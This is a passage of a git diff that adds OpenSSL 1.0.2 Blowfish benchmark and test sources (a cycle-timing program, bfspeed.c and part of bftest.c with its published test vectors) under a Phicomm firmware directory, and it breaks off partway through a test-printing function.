+#if defined(__WATCOMC__)
+void GetTSC(unsigned long&);
+#pragma aux GetTSC = 0x0f 0x31 "mov [edi], eax" parm [edi] modify [edx eax];
+#elif defined(__GNUC__)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  asm volatile(".byte 15, 49\n\t"
+	       : "=eax" (tsc)
+	       :
+	       : "%edx", "%eax");
+}
+#elif defined(_MSC_VER)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  unsigned long a;
+  __asm _emit 0fh
+  __asm _emit 31h
+  __asm mov a, eax;
+  tsc=a;
+}
+#endif      
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/blowfish.h>
+
+void main(int argc,char *argv[])
+	{
+	BF_KEY key;
+	unsigned long s1,s2,e1,e2;
+	unsigned long data[2];
+	int i,j;
+
+	for (j=0; j<6; j++)
+		{
+		for (i=0; i<1000; i++) /**/
+			{
+			BF_encrypt(&data[0],&key);
+			GetTSC(s1);
+			BF_encrypt(&data[0],&key);
+			BF_encrypt(&data[0],&key);
+			BF_encrypt(&data[0],&key);
+			GetTSC(e1);
+			GetTSC(s2);
+			BF_encrypt(&data[0],&key);
+			BF_encrypt(&data[0],&key);
+			BF_encrypt(&data[0],&key);
+			BF_encrypt(&data[0],&key);
+			GetTSC(e2);
+			BF_encrypt(&data[0],&key);
+			}
+
+		printf("blowfish %d %d (%d)\n",
+			e1-s1,e2-s2,((e2-s2)-(e1-s1)));
+		}
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bfspeed.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bfspeed.c
new file mode 100644
index 0000000..305ad8b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bfspeed.c
@@ -0,0 +1,265 @@
+/* crypto/bf/bfspeed.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* 11-Sep-92 Andrew Daviel   Support for Silicon Graphics IRIX added */
+/* 06-Apr-92 Luke Brennan    Support for VMS and add extra signal calls */
+
+#if !defined(OPENSSL_SYS_MSDOS) && (!defined(OPENSSL_SYS_VMS) || defined(__DECC)) && !defined(OPENSSL_SYS_MACOSX)
+# define TIMES
+#endif
+
+#include <stdio.h>
+
+#include <openssl/e_os2.h>
+#include OPENSSL_UNISTD_IO
+OPENSSL_DECLARE_EXIT
+#ifndef OPENSSL_SYS_NETWARE
+# include <signal.h>
+#endif
+#ifndef _IRIX
+# include <time.h>
+#endif
+#ifdef TIMES
+# include <sys/types.h>
+# include <sys/times.h>
+#endif
+    /*
+     * Depending on the VMS version, the tms structure is perhaps defined.
+     * The __TMS macro will show if it was.  If it wasn't defined, we should
+     * undefine TIMES, since that tells the rest of the program how things
+     * should be handled.  -- Richard Levitte
+     */
+#if defined(OPENSSL_SYS_VMS_DECC) && !defined(__TMS)
+# undef TIMES
+#endif
+#ifndef TIMES
+# include <sys/timeb.h>
+#endif
+#if defined(sun) || defined(__ultrix)
+# define _POSIX_SOURCE
+# include <limits.h>
+# include <sys/param.h>
+#endif
+#include <openssl/blowfish.h>
+/* The following if from times(3) man page.  It may need to be changed */
+#ifndef HZ
+# ifndef CLK_TCK
+#  define HZ      100.0
+# else                          /* CLK_TCK */
+#  define HZ ((double)CLK_TCK)
+# endif
+#endif
+#define BUFSIZE ((long)1024)
+long run = 0;
+
+double Time_F(int s);
+#ifdef SIGALRM
+# if defined(__STDC__) || defined(sgi) || defined(_AIX)
+#  define SIGRETTYPE void
+# else
+#  define SIGRETTYPE int
+# endif
+
+SIGRETTYPE sig_done(int sig);
+SIGRETTYPE sig_done(int sig)
+{
+    signal(SIGALRM, sig_done);
+    run = 0;
+# ifdef LINT
+    sig = sig;
+# endif
+}
+#endif
+
+#define START   0
+#define STOP    1
+
+double Time_F(int s)
+{
+    double ret;
+#ifdef TIMES
+    static struct tms tstart, tend;
+
+    if (s == START) {
+        times(&tstart);
+        return (0);
+    } else {
+        times(&tend);
+        ret = ((double)(tend.tms_utime - tstart.tms_utime)) / HZ;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#else                           /* !times() */
+    static struct timeb tstart, tend;
+    long i;
+
+    if (s == START) {
+        ftime(&tstart);
+        return (0);
+    } else {
+        ftime(&tend);
+        i = (long)tend.millitm - (long)tstart.millitm;
+        ret = ((double)(tend.time - tstart.time)) + ((double)i) / 1e3;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#endif
+}
+
+int main(int argc, char **argv)
+{
+    long count;
+    static unsigned char buf[BUFSIZE];
+    static unsigned char key[] = {
+        0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0,
+        0xfe, 0xdc, 0xba, 0x98, 0x76, 0x54, 0x32, 0x10,
+    };
+    BF_KEY sch;
+    double a, b, c, d;
+#ifndef SIGALRM
+    long ca, cb, cc;
+#endif
+
+#ifndef TIMES
+    printf("To get the most accurate results, try to run this\n");
+    printf("program when this computer is idle.\n");
+#endif
+
+#ifndef SIGALRM
+    printf("First we calculate the approximate speed ...\n");
+    BF_set_key(&sch, 16, key);
+    count = 10;
+    do {
+        long i;
+        BF_LONG data[2];
+
+        count *= 2;
+        Time_F(START);
+        for (i = count; i; i--)
+            BF_encrypt(data, &sch);
+        d = Time_F(STOP);
+    } while (d < 3.0);
+    ca = count / 512;
+    cb = count;
+    cc = count * 8 / BUFSIZE + 1;
+    printf("Doing BF_set_key %ld times\n", ca);
+# define COND(d) (count != (d))
+# define COUNT(d) (d)
+#else
+# define COND(c) (run)
+# define COUNT(d) (count)
+    signal(SIGALRM, sig_done);
+    printf("Doing BF_set_key for 10 seconds\n");
+    alarm(10);
+#endif
+
+    Time_F(START);
+    for (count = 0, run = 1; COND(ca); count += 4) {
+        BF_set_key(&sch, 16, key);
+        BF_set_key(&sch, 16, key);
+        BF_set_key(&sch, 16, key);
+        BF_set_key(&sch, 16, key);
+    }
+    d = Time_F(STOP);
+    printf("%ld BF_set_key's in %.2f seconds\n", count, d);
+    a = ((double)COUNT(ca)) / d;
+
+#ifdef SIGALRM
+    printf("Doing BF_encrypt's for 10 seconds\n");
+    alarm(10);
+#else
+    printf("Doing BF_encrypt %ld times\n", cb);
+#endif
+    Time_F(START);
+    for (count = 0, run = 1; COND(cb); count += 4) {
+        BF_LONG data[2];
+
+        BF_encrypt(data, &sch);
+        BF_encrypt(data, &sch);
+        BF_encrypt(data, &sch);
+        BF_encrypt(data, &sch);
+    }
+    d = Time_F(STOP);
+    printf("%ld BF_encrypt's in %.2f second\n", count, d);
+    b = ((double)COUNT(cb) * 8) / d;
+
+#ifdef SIGALRM
+    printf("Doing BF_cbc_encrypt on %ld byte blocks for 10 seconds\n",
+           BUFSIZE);
+    alarm(10);
+#else
+    printf("Doing BF_cbc_encrypt %ld times on %ld byte blocks\n", cc,
+           BUFSIZE);
+#endif
+    Time_F(START);
+    for (count = 0, run = 1; COND(cc); count++)
+        BF_cbc_encrypt(buf, buf, BUFSIZE, &sch, &(key[0]), BF_ENCRYPT);
+    d = Time_F(STOP);
+    printf("%ld BF_cbc_encrypt's of %ld byte blocks in %.2f second\n",
+           count, BUFSIZE, d);
+    c = ((double)COUNT(cc) * BUFSIZE) / d;
+
+    printf("Blowfish set_key       per sec = %12.3f (%9.3fuS)\n", a,
+           1.0e6 / a);
+    printf("Blowfish raw ecb bytes per sec = %12.3f (%9.3fuS)\n", b,
+           8.0e6 / b);
+    printf("Blowfish cbc     bytes per sec = %12.3f (%9.3fuS)\n", c,
+           8.0e6 / c);
+    exit(0);
+#if defined(LINT) || defined(OPENSSL_SYS_MSDOS)
+    return (0);
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bftest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bftest.c
new file mode 100644
index 0000000..0b008f0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bftest.c
@@ -0,0 +1,538 @@
+/* crypto/bf/bftest.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * This has been a quickly hacked 'ideatest.c'.  When I add tests for other
+ * RC2 modes, more of the code will be uncommented.
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <openssl/opensslconf.h> /* To see if OPENSSL_NO_BF is defined */
+
+#include "../e_os.h"
+
+#ifdef OPENSSL_NO_BF
+int main(int argc, char *argv[])
+{
+    printf("No BF support\n");
+    return (0);
+}
+#else
+# include <openssl/blowfish.h>
+
+# ifdef CHARSET_EBCDIC
+#  include <openssl/ebcdic.h>
+# endif
+
+static char *bf_key[2] = {
+    "abcdefghijklmnopqrstuvwxyz",
+    "Who is John Galt?"
+};
+
+/* big endian */
+static BF_LONG bf_plain[2][2] = {
+    {0x424c4f57L, 0x46495348L},
+    {0xfedcba98L, 0x76543210L}
+};
+
+static BF_LONG bf_cipher[2][2] = {
+    {0x324ed0feL, 0xf413a203L},
+    {0xcc91732bL, 0x8022f684L}
+};
+
+/************/
+
+/* Lets use the DES test vectors :-) */
+# define NUM_TESTS 34
+static unsigned char ecb_data[NUM_TESTS][8] = {
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF},
+    {0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11},
+    {0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF},
+    {0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0xFE, 0xDC, 0xBA, 0x98, 0x76, 0x54, 0x32, 0x10},
+    {0x7C, 0xA1, 0x10, 0x45, 0x4A, 0x1A, 0x6E, 0x57},
+    {0x01, 0x31, 0xD9, 0x61, 0x9D, 0xC1, 0x37, 0x6E},
+    {0x07, 0xA1, 0x13, 0x3E, 0x4A, 0x0B, 0x26, 0x86},
+    {0x38, 0x49, 0x67, 0x4C, 0x26, 0x02, 0x31, 0x9E},
+    {0x04, 0xB9, 0x15, 0xBA, 0x43, 0xFE, 0xB5, 0xB6},
+    {0x01, 0x13, 0xB9, 0x70, 0xFD, 0x34, 0xF2, 0xCE},
+    {0x01, 0x70, 0xF1, 0x75, 0x46, 0x8F, 0xB5, 0xE6},
+    {0x43, 0x29, 0x7F, 0xAD, 0x38, 0xE3, 0x73, 0xFE},
+    {0x07, 0xA7, 0x13, 0x70, 0x45, 0xDA, 0x2A, 0x16},
+    {0x04, 0x68, 0x91, 0x04, 0xC2, 0xFD, 0x3B, 0x2F},
+    {0x37, 0xD0, 0x6B, 0xB5, 0x16, 0xCB, 0x75, 0x46},
+    {0x1F, 0x08, 0x26, 0x0D, 0x1A, 0xC2, 0x46, 0x5E},
+    {0x58, 0x40, 0x23, 0x64, 0x1A, 0xBA, 0x61, 0x76},
+    {0x02, 0x58, 0x16, 0x16, 0x46, 0x29, 0xB0, 0x07},
+    {0x49, 0x79, 0x3E, 0xBC, 0x79, 0xB3, 0x25, 0x8F},
+    {0x4F, 0xB0, 0x5E, 0x15, 0x15, 0xAB, 0x73, 0xA7},
+    {0x49, 0xE9, 0x5D, 0x6D, 0x4C, 0xA2, 0x29, 0xBF},
+    {0x01, 0x83, 0x10, 0xDC, 0x40, 0x9B, 0x26, 0xD6},
+    {0x1C, 0x58, 0x7F, 0x1C, 0x13, 0x92, 0x4F, 0xEF},
+    {0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01},
+    {0x1F, 0x1F, 0x1F, 0x1F, 0x0E, 0x0E, 0x0E, 0x0E},
+    {0xE0, 0xFE, 0xE0, 0xFE, 0xF1, 0xFE, 0xF1, 0xFE},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF},
+    {0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF},
+    {0xFE, 0xDC, 0xBA, 0x98, 0x76, 0x54, 0x32, 0x10}
+};
+
+static unsigned char plain_data[NUM_TESTS][8] = {
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF},
+    {0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01},
+    {0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11},
+    {0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11},
+    {0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF},
+    {0x01, 0xA1, 0xD6, 0xD0, 0x39, 0x77, 0x67, 0x42},
+    {0x5C, 0xD5, 0x4C, 0xA8, 0x3D, 0xEF, 0x57, 0xDA},
+    {0x02, 0x48, 0xD4, 0x38, 0x06, 0xF6, 0x71, 0x72},
+    {0x51, 0x45, 0x4B, 0x58, 0x2D, 0xDF, 0x44, 0x0A},
+    {0x42, 0xFD, 0x44, 0x30, 0x59, 0x57, 0x7F, 0xA2},
+    {0x05, 0x9B, 0x5E, 0x08, 0x51, 0xCF, 0x14, 0x3A},
+    {0x07, 0x56, 0xD8, 0xE0, 0x77, 0x47, 0x61, 0xD2},
+    {0x76, 0x25, 0x14, 0xB8, 0x29, 0xBF, 0x48, 0x6A},
+    {0x3B, 0xDD, 0x11, 0x90, 0x49, 0x37, 0x28, 0x02},
+    {0x26, 0x95, 0x5F, 0x68, 0x35, 0xAF, 0x60, 0x9A},
+    {0x16, 0x4D, 0x5E, 0x40, 0x4F, 0x27, 0x52, 0x32},
+    {0x6B, 0x05, 0x6E, 0x18, 0x75, 0x9F, 0x5C, 0xCA},
+    {0x00, 0x4B, 0xD6, 0xEF, 0x09, 0x17, 0x60, 0x62},
+    {0x48, 0x0D, 0x39, 0x00, 0x6E, 0xE7, 0x62, 0xF2},
+    {0x43, 0x75, 0x40, 0xC8, 0x69, 0x8F, 0x3C, 0xFA},
+    {0x07, 0x2D, 0x43, 0xA0, 0x77, 0x07, 0x52, 0x92},
+    {0x02, 0xFE, 0x55, 0x77, 0x81, 0x17, 0xF1, 0x2A},
+    {0x1D, 0x9D, 0x5C, 0x50, 0x18, 0xF7, 0x28, 0xC2},
+    {0x30, 0x55, 0x32, 0x28, 0x6D, 0x6F, 0x29, 0x5A},
+    {0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF},
+    {0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF},
+    {0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF},
+    {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF}
+};
+
+static unsigned char cipher_data[NUM_TESTS][8] = {
+    {0x4E, 0xF9, 0x97, 0x45, 0x61, 0x98, 0xDD, 0x78},
+    {0x51, 0x86, 0x6F, 0xD5, 0xB8, 0x5E, 0xCB, 0x8A},
+    {0x7D, 0x85, 0x6F, 0x9A, 0x61, 0x30, 0x63, 0xF2},
+    {0x24, 0x66, 0xDD, 0x87, 0x8B, 0x96, 0x3C, 0x9D},
+    {0x61, 0xF9, 0xC3, 0x80, 0x22, 0x81, 0xB0, 0x96},
+    {0x7D, 0x0C, 0xC6, 0x30, 0xAF, 0xDA, 0x1E, 0xC7},
+    {0x4E, 0xF9, 0x97, 0x45, 0x61, 0x98, 0xDD, 0x78},
+    {0x0A, 0xCE, 0xAB, 0x0F, 0xC6, 0xA0, 0xA2, 0x8D},
+    {0x59, 0xC6, 0x82, 0x45, 0xEB, 0x05, 0x28, 0x2B},
+    {0xB1, 0xB8, 0xCC, 0x0B, 0x25, 0x0F, 0x09, 0xA0},
+    {0x17, 0x30, 0xE5, 0x77, 0x8B, 0xEA, 0x1D, 0xA4},
+    {0xA2, 0x5E, 0x78, 0x56, 0xCF, 0x26, 0x51, 0xEB},
+    {0x35, 0x38, 0x82, 0xB1, 0x09, 0xCE, 0x8F, 0x1A},
+    {0x48, 0xF4, 0xD0, 0x88, 0x4C, 0x37, 0x99, 0x18},
+    {0x43, 0x21, 0x93, 0xB7, 0x89, 0x51, 0xFC, 0x98},
+    {0x13, 0xF0, 0x41, 0x54, 0xD6, 0x9D, 0x1A, 0xE5},
+    {0x2E, 0xED, 0xDA, 0x93, 0xFF, 0xD3, 0x9C, 0x79},
+    {0xD8, 0x87, 0xE0, 0x39, 0x3C, 0x2D, 0xA6, 0xE3},
+    {0x5F, 0x99, 0xD0, 0x4F, 0x5B, 0x16, 0x39, 0x69},
+    {0x4A, 0x05, 0x7A, 0x3B, 0x24, 0xD3, 0x97, 0x7B},
+    {0x45, 0x20, 0x31, 0xC1, 0xE4, 0xFA, 0xDA, 0x8E},
+    {0x75, 0x55, 0xAE, 0x39, 0xF5, 0x9B, 0x87, 0xBD},
+    {0x53, 0xC5, 0x5F, 0x9C, 0xB4, 0x9F, 0xC0, 0x19},
+    {0x7A, 0x8E, 0x7B, 0xFA, 0x93, 0x7E, 0x89, 0xA3},
+    {0xCF, 0x9C, 0x5D, 0x7A, 0x49, 0x86, 0xAD, 0xB5},
+    {0xD1, 0xAB, 0xB2, 0x90, 0x65, 0x8B, 0xC7, 0x78},
+    {0x55, 0xCB, 0x37, 0x74, 0xD1, 0x3E, 0xF2, 0x01},
+    {0xFA, 0x34, 0xEC, 0x48, 0x47, 0xB2, 0x68, 0xB2},
+    {0xA7, 0x90, 0x79, 0x51, 0x08, 0xEA, 0x3C, 0xAE},
+    {0xC3, 0x9E, 0x07, 0x2D, 0x9F, 0xAC, 0x63, 0x1D},
+    {0x01, 0x49, 0x33, 0xE0, 0xCD, 0xAF, 0xF6, 0xE4},
+    {0xF2, 0x1E, 0x9A, 0x77, 0xB7, 0x1C, 0x49, 0xBC},
+    {0x24, 0x59, 0x46, 0x88, 0x57, 0x54, 0x36, 0x9A},
+    {0x6B, 0x5C, 0x5A, 0x9C, 0x5D, 0x9E, 0x0A, 0x5A},
+};
+
+static unsigned char cbc_key[16] = {
+    0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef,
+    0xf0, 0xe1, 0xd2, 0xc3, 0xb4, 0xa5, 0x96, 0x87
+};
+static unsigned char cbc_iv[8] =
+    { 0xfe, 0xdc, 0xba, 0x98, 0x76, 0x54, 0x32, 0x10 };
+static char cbc_data[40] = "7654321 Now is the time for ";
+static unsigned char cbc_ok[32] = {
+    0x6B, 0x77, 0xB4, 0xD6, 0x30, 0x06, 0xDE, 0xE6,
+    0x05, 0xB1, 0x56, 0xE2, 0x74, 0x03, 0x97, 0x93,
+    0x58, 0xDE, 0xB9, 0xE7, 0x15, 0x46, 0x16, 0xD9,
+    0x59, 0xF1, 0x65, 0x2B, 0xD5, 0xFF, 0x92, 0xCC
+};
+
+static unsigned char cfb64_ok[] = {
+    0xE7, 0x32, 0x14, 0xA2, 0x82, 0x21, 0x39, 0xCA,
+    0xF2, 0x6E, 0xCF, 0x6D, 0x2E, 0xB9, 0xE7, 0x6E,
+    0x3D, 0xA3, 0xDE, 0x04, 0xD1, 0x51, 0x72, 0x00,
+    0x51, 0x9D, 0x57, 0xA6, 0xC3
+};
+
+static unsigned char ofb64_ok[] = {
+    0xE7, 0x32, 0x14, 0xA2, 0x82, 0x21, 0x39, 0xCA,
+    0x62, 0xB3, 0x43, 0xCC, 0x5B, 0x65, 0x58, 0x73,
+    0x10, 0xDD, 0x90, 0x8D, 0x0C, 0x24, 0x1B, 0x22,
+    0x63, 0xC2, 0xCF, 0x80, 0xDA
+};
+
+# define KEY_TEST_NUM    25
+static unsigned char key_test[KEY_TEST_NUM] = {
+    0xf0, 0xe1, 0xd2, 0xc3, 0xb4, 0xa5, 0x96, 0x87,
+    0x78, 0x69, 0x5a, 0x4b, 0x3c, 0x2d, 0x1e, 0x0f,
+    0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77,
+    0x88
+};
+
+static unsigned char key_data[8] =
+    { 0xFE, 0xDC, 0xBA, 0x98, 0x76, 0x54, 0x32, 0x10 };
+
+static unsigned char key_out[KEY_TEST_NUM][8] = {
+    {0xF9, 0xAD, 0x59, 0x7C, 0x49, 0xDB, 0x00, 0x5E},
+    {0xE9, 0x1D, 0x21, 0xC1, 0xD9, 0x61, 0xA6, 0xD6},
+    {0xE9, 0xC2, 0xB7, 0x0A, 0x1B, 0xC6, 0x5C, 0xF3},
+    {0xBE, 0x1E, 0x63, 0x94, 0x08, 0x64, 0x0F, 0x05},
+    {0xB3, 0x9E, 0x44, 0x48, 0x1B, 0xDB, 0x1E, 0x6E},
+    {0x94, 0x57, 0xAA, 0x83, 0xB1, 0x92, 0x8C, 0x0D},
+    {0x8B, 0xB7, 0x70, 0x32, 0xF9, 0x60, 0x62, 0x9D},
+    {0xE8, 0x7A, 0x24, 0x4E, 0x2C, 0xC8, 0x5E, 0x82},
+    {0x15, 0x75, 0x0E, 0x7A, 0x4F, 0x4E, 0xC5, 0x77},
+    {0x12, 0x2B, 0xA7, 0x0B, 0x3A, 0xB6, 0x4A, 0xE0},
+    {0x3A, 0x83, 0x3C, 0x9A, 0xFF, 0xC5, 0x37, 0xF6},
+    {0x94, 0x09, 0xDA, 0x87, 0xA9, 0x0F, 0x6B, 0xF2},
+    {0x88, 0x4F, 0x80, 0x62, 0x50, 0x60, 0xB8, 0xB4},
+    {0x1F, 0x85, 0x03, 0x1C, 0x19, 0xE1, 0x19, 0x68},
+    {0x79, 0xD9, 0x37, 0x3A, 0x71, 0x4C, 0xA3, 0x4F},
+    {0x93, 0x14, 0x28, 0x87, 0xEE, 0x3B, 0xE1, 0x5C},
+    {0x03, 0x42, 0x9E, 0x83, 0x8C, 0xE2, 0xD1, 0x4B},
+    {0xA4, 0x29, 0x9E, 0x27, 0x46, 0x9F, 0xF6, 0x7B},
+    {0xAF, 0xD5, 0xAE, 0xD1, 0xC1, 0xBC, 0x96, 0xA8},
+    {0x10, 0x85, 0x1C, 0x0E, 0x38, 0x58, 0xDA, 0x9F},
+    {0xE6, 0xF5, 0x1E, 0xD7, 0x9B, 0x9D, 0xB2, 0x1F},
+    {0x64, 0xA6, 0xE1, 0x4A, 0xFD, 0x36, 0xB4, 0x6F},
+    {0x80, 0xC7, 0xD7, 0xD4, 0x5A, 0x54, 0x79, 0xAD},
+    {0x05, 0x04, 0x4B, 0x62, 0xFA, 0x52, 0xD0, 0x80},
+};
+
+static int test(void);
+static int print_test_data(void);
+int main(int argc, char *argv[])
+{
+    int ret;
+
+    if (argc > 1)
+        ret = print_test_data();
+    else
+        ret = test();
+
+# ifdef OPENSSL_SYS_NETWARE
+    if (ret)
+        printf("ERROR: %d\n", ret);
+# endif
+    EXIT(ret);
+    return (0);
+}
+
+static int print_test_data(void)
+{
+    unsigned int i, j;
+
+    printf("ecb test data\n");
+    printf("key bytes\t\tclear bytes\t\tcipher bytes\n");
+    for (i = 0; i < NUM_TESTS; i++) {
+        for (j = 0; j < 8; j++)
+            printf("%02X", ecb_data[i][j]);
+        printf("\t");
+        for (j = 0; j < 8; j++)
+            printf("%02X", plain_data[i][j]);
+        printf("\t");
+        for (j = 0; j < 8; j++)
+            printf("%02X", cipher_data[i][j]);
+        printf("\n");
+    }
+
+    printf("set_key test data\n");
+    printf("data[8]= ");
+    for (j = 0; j < 8; j++)
